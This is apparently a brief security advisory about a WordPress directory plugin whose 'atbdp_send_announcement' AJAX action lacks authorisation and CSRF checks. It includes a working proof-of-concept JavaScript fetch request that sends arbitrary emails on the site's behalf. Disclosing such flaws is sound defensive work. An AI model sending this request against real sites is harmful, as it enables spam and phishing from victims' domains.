The plugin does not have authorisation and CSRF checks in an AJAX action, allowing any authenticated users to send arbitrary emails on behalf of the blog
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "action=atbdp_send_announcement&[email protected]&subject=subject&message=content&send_to_email=1",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));